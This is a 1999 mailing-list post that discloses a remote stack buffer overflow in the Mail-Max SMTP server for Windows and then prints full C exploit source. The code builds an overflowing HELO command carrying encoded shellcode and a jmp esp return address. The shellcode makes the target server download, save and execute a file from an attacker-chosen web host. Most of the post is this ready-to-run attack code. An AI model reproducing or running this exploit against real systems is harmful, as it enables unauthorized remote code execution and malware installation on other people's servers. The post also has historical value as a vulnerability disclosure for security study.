Date: Sun, 14 Feb 1999 01:00:30 -0500 From: pw Subject: Mail-Max Remote Buffer Overflow Exploit Mail-Max is a SMTP server for windows 95/98/NT. Unfortunately, it has a very large security hole. By entering SMTP commands with a long length one is able to write past the bounds of a buffer on the stack. By overflowing this buffer one can modify the return address stored on the stack to point to arbitrary code. This can be used to gain unauthorized remote access. When putting code in the buffer to execute there are no major restrictions on character set. The only character I found to interfere besides null was 17h (ret). In this particular overflow's case there is more than enough room to place code after the return address on the stack. Placeing the exploit code here has major benefits: -- It is not as likely to get corrupted as code is that is placed before the return address. -- We can change the return address to point to a jmp esp or equivalent instruction(s) to transfer control to our code. This also allows us to write an exploit that will work on every vulnerable version (assuming the offset stays constant), even versions we don't have access to. Mail-Max's basic construction also aids in its exploiting. When it is installed it insists that it have v1.5c of its ODBC Drivers installed. If these drivers are not already installed it will ask to install them. This makes it easy to consistantly exploit, as predicting where in memory a jmp esp or equivalent piece of code is located is easy because 98% of the mailmax machines will be running this version of the libraries. Its sad that Mail-Max has this vulnerability as its obvious the author(s) know the dangers of buffer overflows. When you try to overflow buffers in popmax (a pop3 server that comes with mailmax), you get an error specifying that you tried to overflow a buffer. You also see similar messages when you try to overflow buffers in its sister product ftpmax. Following this post is an exploit that will force all versions of Mail-Max that have the buffer overflow (every version I have tested), and are running ODBC drivers v1.5c to download a file from a web site, save it, and execute it. Please note that the file downloaded can't be larger than 260,000 bytes. <--------------------------CUT HERE--------------------------> #include #include #include #include #include #include #include /* Mail-Max Remote Exploit by _mcp_ This program must be run under x86 Linux Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio, Wrl, #finite, #win32asm and anyone I may have missed, you know who you are :). You can reach me on efnet. No greets go out to etl. */ char code[] = "\xEB\x45\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x29\x46\x58\xFF\xE0\xBB\x40\xA5\x1\x10\x56\xFF\x13\x8B" "\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46\x40\x3A\x6\x74\xE5\x56" "\x55\xBB\x54\xA5\x1\x10\xFF\x13\xAB\xEB\xE7\xEB\x4F\x33\xC9" "\x66\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8" "\x33\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51" "\x51\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83" "\xC6\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8" "\xFF\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF" "\x57\xF0\xE8\x67\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33" "\x1\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75" "\x66\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62" "\x6D\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1" "\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A" "\x4F\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50" "\x71\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75" "\x53\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B" "\x30\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); return(binip); } int usages(char *fname) { printf("Remote Mail-Max exploit v1.0 by _mcp_ .\n"); printf("Usages: \n"); printf("%s \n", fname); printf("All known versions offset = 539, Return address = 79887315\n"); printf("Will make target download, save, and execute http:///~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,filedesc,offset,targethost,sinlen,codelength; struct sockaddr_in sin; unsigned char buffer[8000]; char ipbuffer[16]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long address; if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } offset = atoi(argv[3]); ret_addr = atol(argv[4]); if (offset > 7000) { printf("Offset too large.\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"HELO "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr+=offset; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); write(sock, &buffer, strlen((char *)&buffer) ); write(sock,"\r\n",2); sleep(1); printf("Sent the egg\n"); close(sock); exit(1); }